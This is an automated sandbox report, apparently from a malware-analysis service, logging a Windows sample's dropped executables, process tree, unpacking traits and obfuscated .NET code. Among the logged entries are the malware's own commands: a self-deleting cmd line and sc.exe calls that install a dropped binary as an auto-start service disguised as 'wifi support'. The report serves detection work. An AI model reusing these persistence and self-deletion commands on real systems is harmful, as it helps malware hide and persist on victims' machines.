                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeProcess created: C:\Users\user\AppData\Local\Temp\2AA1.exe C:\Users\user\AppData\Local\Temp\2AA1.exe
                        Source: C:\Users\user\AppData\Roaming\jutawrsProcess created: C:\Users\user\AppData\Roaming\jutawrs C:\Users\user\AppData\Roaming\jutawrs
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E936.exe C:\Users\user\AppData\Local\Temp\E936.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F3F5.exe C:\Users\user\AppData\Local\Temp\F3F5.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A3D.exe C:\Users\user\AppData\Local\Temp\A3D.exe
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\E936.exe" & exit
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\lxijggxd\
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess created: C:\Users\user\AppData\Local\Temp\A3D.exe C:\Users\user\AppData\Local\Temp\A3D.exe
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\almerphs.exe" C:\Windows\SysWOW64\lxijggxd\
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\SysWOW64\sc.exe" create lxijggxd binPath= "C:\Windows\SysWOW64\lxijggxd\almerphs.exe /d\"C:\Users\user\AppData\Local\Temp\F3F5.exe\"" type= own start= auto DisplayName= "wifi support
                        Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\SysWOW64\sc.exe" description lxijggxd "wifi internet conection
                        Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeProcess created: C:\Users\user\Desktop\4BfFNMA5mb.exe "C:\Users\user\Desktop\4BfFNMA5mb.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2AA1.exe C:\Users\user\AppData\Local\Temp\2AA1.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E936.exe C:\Users\user\AppData\Local\Temp\E936.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F3F5.exe C:\Users\user\AppData\Local\Temp\F3F5.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A3D.exe C:\Users\user\AppData\Local\Temp\A3D.exe
                        Source: C:\Users\user\AppData\Roaming\jutawrsProcess created: C:\Users\user\AppData\Roaming\jutawrs C:\Users\user\AppData\Roaming\jutawrs
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeProcess created: C:\Users\user\AppData\Local\Temp\2AA1.exe C:\Users\user\AppData\Local\Temp\2AA1.exe
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\E936.exe" & exit
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess created: C:\Users\user\AppData\Local\Temp\A3D.exe C:\Users\user\AppData\Local\Temp\A3D.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
                        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2AA1.tmpJump to behavior
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 1_2_0041CAD7 GetTickCount,FreeUserPhysicalPages,GetCalendarInfoW,GetProfileStringA,SetLastError,GetSystemWow64DirectoryA,GetWindowsDirectoryW,GetCPInfoExW,GetDiskFreeSpaceExW,GetStartupInfoA,ReadConsoleOutputCharacterA,CreateNamedPipeW,GetProcessHeap,GetProcessHeap,GetPrivateProfileIntW,SetFileAttributesA,
                        Source: sqlite3[1].dll.25.dr, sqlite3.dll.25.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                        Source: sqlite3[1].dll.25.dr, sqlite3.dll.25.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: sqlite3[1].dll.25.dr, sqlite3.dll.25.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                        Source: sqlite3[1].dll.25.dr, sqlite3.dll.25.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                        Source: sqlite3[1].dll.25.dr, sqlite3.dll.25.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: sqlite3[1].dll.25.dr, sqlite3.dll.25.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: sqlite3[1].dll.25.dr, sqlite3.dll.25.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: sqlite3[1].dll.25.dr, sqlite3.dll.25.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                        Source: sqlite3[1].dll.25.dr, sqlite3.dll.25.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                        Source: sqlite3[1].dll.25.dr, sqlite3.dll.25.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: sqlite3[1].dll.25.dr, sqlite3.dll.25.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: sqlite3[1].dll.25.dr, sqlite3.dll.25.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6708:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3376:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4060:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5572:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5608:120:WilError_01
                        Source: 8992.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                        Source: 8992.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                        Source: A3D.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                        Source: A3D.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                        Source: 27.0.A3D.exe.710000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                        Source: 27.0.A3D.exe.710000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                        Source: 27.2.A3D.exe.710000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                        Source: 27.2.A3D.exe.710000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                        Source: 27.0.A3D.exe.710000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                        Source: 27.0.A3D.exe.710000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                        Source: 27.0.A3D.exe.710000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                        Source: 27.0.A3D.exe.710000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                        Source: 4BfFNMA5mb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: 4BfFNMA5mb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: 4BfFNMA5mb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: 4BfFNMA5mb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: 4BfFNMA5mb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: 4BfFNMA5mb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: 4BfFNMA5mb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: C:\Users\Administrator\Desktop\SystemInjectSvHostAllocation - Copy.pdb source: A847.exe.10.dr
                        Source: Binary string: C:\dixujupufakeka\dopuvo\hujom\vex.pdb source: 9904.exe.10.dr
                        Source: Binary string: ,C:\rolodevimigez\21\hiyilayiv\fijajifare23.pdb source: F3F5.exe.10.dr, almerphs.exe.26.dr
                        Source: Binary string: _tcC:\mefalizor\60\zorukuxibu\naritukeyipis\cudoyiyojil82 xero.pdb source: E936.exe, 00000019.00000000.426131563.0000000000401000.00000020.00020000.sdmp, E936.exe.10.dr
                        Source: Binary string: ,C:\tezosifoca-wugehesigije\navilemezu\cideno\xada\doj\bifehu.pdb source: 2AA1.exe, 0000000F.00000000.384214228.0000000000401000.00000020.00020000.sdmp, 2AA1.exe, 0000000F.00000002.394917452.0000000000401000.00000020.00020000.sdmp, 2AA1.exe, 00000013.00000000.390990579.0000000000401000.00000020.00020000.sdmp, 2AA1.exe.10.dr
                        Source: Binary string: C:\mefalizor\60\zorukuxibu\naritukeyipis\cudoyiyojil82 xero.pdb source: E936.exe, 00000019.00000000.426131563.0000000000401000.00000020.00020000.sdmp, E936.exe.10.dr
                        Source: Binary string: C:\zoci\kiz\ponecun6\camokixuki1\janel.pdb source: 6BE6.exe.10.dr
                        Source: Binary string: C:\tezosifoca-wugehesigije\navilemezu\cideno\xada\doj\bifehu.pdb source: 2AA1.exe, 2AA1.exe, 0000000F.00000000.384214228.0000000000401000.00000020.00020000.sdmp, 2AA1.exe, 0000000F.00000002.394917452.0000000000401000.00000020.00020000.sdmp, 2AA1.exe, 00000013.00000000.390990579.0000000000401000.00000020.00020000.sdmp, 2AA1.exe.10.dr
                        Source: Binary string: C:\kuxiv32_sicag\zamev cukohezo-baruledece_hopigije.pdb source: 4BfFNMA5mb.exe, jutawrs.10.dr
                        Source: Binary string: EC:\dixujupufakeka\dopuvo\hujom\vex.pdb source: 9904.exe.10.dr
                        Source: Binary string: C:\rolodevimigez\21\hiyilayiv\fijajifare23.pdb source: F3F5.exe.10.dr, almerphs.exe.26.dr

                        Data Obfuscation:

                        barindex
                        Detected unpacking (overwrites its own PE header)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeUnpacked PE file: 25.2.E936.exe.400000.0.unpack
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeUnpacked PE file: 26.2.F3F5.exe.400000.0.unpack
                        Detected unpacking (changes PE section rights)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeUnpacked PE file: 25.2.E936.exe.400000.0.unpack .text:ER;.data:W;.fig:W;.hilo:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeUnpacked PE file: 26.2.F3F5.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.zupi:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                        .NET source code contains potential unpackerShow sources
                        Source: A847.exe.10.dr, WindowsFormsApp71/BitUtils.cs.Net Code: getActionMemberEnd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                        .NET source code contains method to dynamically call methods (often used by packers)Show sources
                        Source: 8992.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                        Source: A3D.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                        Source: 27.0.A3D.exe.710000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                        Source: 27.2.A3D.exe.710000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                        Source: 27.0.A3D.exe.710000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                        Source: 27.0.A3D.exe.710000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                        Source: 27.0.A3D.exe.710000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                        Source: 39.0.A3D.exe.8f0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_2_00401880 push esi; iretd
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_2_00402E94 push es; iretd
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_1_00402E94 push es; iretd
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_2_00401880 push esi; iretd
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_2_00402E94 push es; iretd
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_1_00402E94 push es; iretd
                        Source: C:\Users\user\AppData\Roaming\jutawrsCode function: 20_2_00402E94 push es; iretd
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_004139B0 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeCode function: 26_2_00841283 push ds; ret
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeCode function: 26_2_00843A79 push 0000002Bh; iretd
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeCode function: 27_2_007169CF pushfd ; iretd
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeCode function: 27_2_00716A43 pushfd ; iretd
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeCode function: 27_2_007147D0 push 00000028h; retf 0000h
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeCode function: 27_2_050DCB38 pushad ; retf
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeCode function: 27_2_050DCB78 pushfd ; retf
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeCode function: 27_2_05102DBB push es; ret
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeCode function: 27_2_05101648 push ds; ret
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeCode function: 27_2_0510714C push cs; ret
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeCode function: 27_2_05101380 push ds; ret
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 1_2_00432E00 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                        Source: 8992.exe.10.drStatic PE information: 0x8F25025D [Tue Feb 6 22:02:05 2046 UTC]
                        Source: 4BfFNMA5mb.exeStatic PE information: section name: .gijuril
                        Source: 4BfFNMA5mb.exeStatic PE information: section name: .fisate
                        Source: 6BE6.exe.10.drStatic PE information: section name: .huwu
                        Source: 6BE6.exe.10.drStatic PE information: section name: .sax
                        Source: 7D3D.exe.10.drStatic PE information: section name: .shared
                        Source: 9904.exe.10.drStatic PE information: section name: .repimu
                        Source: 9904.exe.10.drStatic PE information: section name: .foheha
                        Source: B24B.exe.10.drStatic PE information: section name:
                        Source: B24B.exe.10.drStatic PE information: section name:
                        Source: B24B.exe.10.drStatic PE information: section name:
                        Source: B24B.exe.10.drStatic PE information: section name:
                        Source: B24B.exe.10.drStatic PE information: section name:
                        Source: B24B.exe.10.drStatic PE information: section name:
                        Source: B24B.exe.10.drStatic PE information: section name:
                        Source: B24B.exe.10.drStatic PE information: section name: .f7uSTEx
                        Source: B24B.exe.10.drStatic PE information: section name: .adata
                        Source: 2AA1.exe.10.drStatic PE information: section name: .sikuz
                        Source: 2AA1.exe.10.drStatic PE information: section name: .begene
                        Source: E936.exe.10.drStatic PE information: section name: .fig
                        Source: E936.exe.10.drStatic PE information: section name: .hilo
                        Source: F3F5.exe.10.drStatic PE information: section name: .zupi
                        Source: jutawrs.10.drStatic PE information: section name: .gijuril
                        Source: jutawrs.10.drStatic PE information: section name: .fisate
                        Source: sqlite3.dll.25.drStatic PE information: section name: /4
                        Source: sqlite3.dll.25.drStatic PE information: section name: /19
                        Source: sqlite3.dll.25.drStatic PE information: section name: /35
                        Source: sqlite3.dll.25.drStatic PE information: section name: /51
                        Source: sqlite3.dll.25.drStatic PE information: section name: /63
                        Source: sqlite3.dll.25.drStatic PE information: section name: /77
                        Source: sqlite3.dll.25.drStatic PE information: section name: /89
                        Source: sqlite3.dll.25.drStatic PE information: section name: /102
                        Source: sqlite3.dll.25.drStatic PE information: section name: /113
                        Source: sqlite3.dll.25.drStatic PE information: section name: /124
                        Source: sqlite3[1].dll.25.drStatic PE information: section name: /4
                        Source: sqlite3[1].dll.25.drStatic PE information: section name: /19
                        Source: sqlite3[1].dll.25.drStatic PE information: section name: /35
                        Source: sqlite3[1].dll.25.drStatic PE information: section name: /51
                        Source: sqlite3[1].dll.25.drStatic PE information: section name: /63
                        Source: sqlite3[1].dll.25.drStatic PE information: section name: /77
                        Source: sqlite3[1].dll.25.drStatic PE information: section name: /89
                        Source: sqlite3[1].dll.25.drStatic PE information: section name: /102
                        Source: sqlite3[1].dll.25.drStatic PE information: section name: /113
                        Source: sqlite3[1].dll.25.drStatic PE information: section name: /124
                        Source: almerphs.exe.26.drStatic PE information: section name: .zupi
                        Source: initial sampleStatic PE information: section where entry point is pointing to: DATA
                        Source: A3D.exe.10.drStatic PE information: real checksum: 0x0 should be: 0x8ce73
                        Source: A847.exe.10.drStatic PE information: real checksum: 0x0 should be: 0x8cbd7
                        Source: BC9C.exe.10.drStatic PE information: real checksum: 0x0 should be: 0x2af42
                        Source: 8992.exe.10.drStatic PE information: real checksum: 0x0 should be: 0x8b750
                        Source: B24B.exe.10.drStatic PE information: real checksum: 0x375d61 should be: 0x381423
                        Source: initial sampleStatic PE information: section name: .text entropy: 6.87521198283
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.79683538387
                        Source: initial sampleStatic PE information: section name: DATA entropy: 7.9969792001
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.76710894872
                        Source: initial sampleStatic PE information: section name: entropy: 7.99506790301
                        Source: initial sampleStatic PE information: section name: entropy: 7.82703526497
                        Source: initial sampleStatic PE information: section name: entropy: 7.95119860642
                        Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.9974200792
                        Source: initial sampleStatic PE information: section name: .f7uSTEx entropy: 7.91980898395
                        Source: initial sampleStatic PE information: section name: .text entropy: 6.86968952678
                        Source: initial sampleStatic PE information: section name: .text entropy: 6.89863439177
                        Source: initial sampleStatic PE information: section name: .text entropy: 6.87521198283
                        Source: 8992.exe.10.dr, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.csHigh entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'x2edtkdgqcCM9BTWgG9'
                        Source: 8992.exe.10.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'KyMgXHFOND', '.cctor', 'GSyCOj2cheuaRl0Bax', 'rrbeVD6ZpDw6na9J8c', 'J0smSaMe8lMPWRe9Sy', 'Btd50XY8dwYDE1LMUQ'
                        Source: 8992.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'fSQ4S14sW5', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                        Source: A3D.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'gJu1vuOsMV', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                        Source: A3D.exe.10.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'D4GAbsxtFT', '.cctor', 'PYWC1Vd4G6nANFqse4', 'pJAxuRZqVEV0EDZmSp', 'Ql54pvmHfOuyRwtUOk', 'ISTaDZMy33ci7HGt5t'
                        Source: 27.0.A3D.exe.710000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'gJu1vuOsMV', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                        Source: 27.0.A3D.exe.710000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'D4GAbsxtFT', '.cctor', 'PYWC1Vd4G6nANFqse4', 'pJAxuRZqVEV0EDZmSp', 'Ql54pvmHfOuyRwtUOk', 'ISTaDZMy33ci7HGt5t'
                        Source: 27.2.A3D.exe.710000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'gJu1vuOsMV', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                        Source: 27.2.A3D.exe.710000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'D4GAbsxtFT', '.cctor', 'PYWC1Vd4G6nANFqse4', 'pJAxuRZqVEV0EDZmSp', 'Ql54pvmHfOuyRwtUOk', 'ISTaDZMy33ci7HGt5t'
                        Source: 27.0.A3D.exe.710000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'D4GAbsxtFT', '.cctor', 'PYWC1Vd4G6nANFqse4', 'pJAxuRZqVEV0EDZmSp', 'Ql54pvmHfOuyRwtUOk', 'ISTaDZMy33ci7HGt5t'
                        Source: 27.0.A3D.exe.710000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'gJu1vuOsMV', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                        Source: 27.0.A3D.exe.710000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'D4GAbsxtFT', '.cctor', 'PYWC1Vd4G6nANFqse4', 'pJAxuRZqVEV0EDZmSp', 'Ql54pvmHfOuyRwtUOk', 'ISTaDZMy33ci7HGt5t'
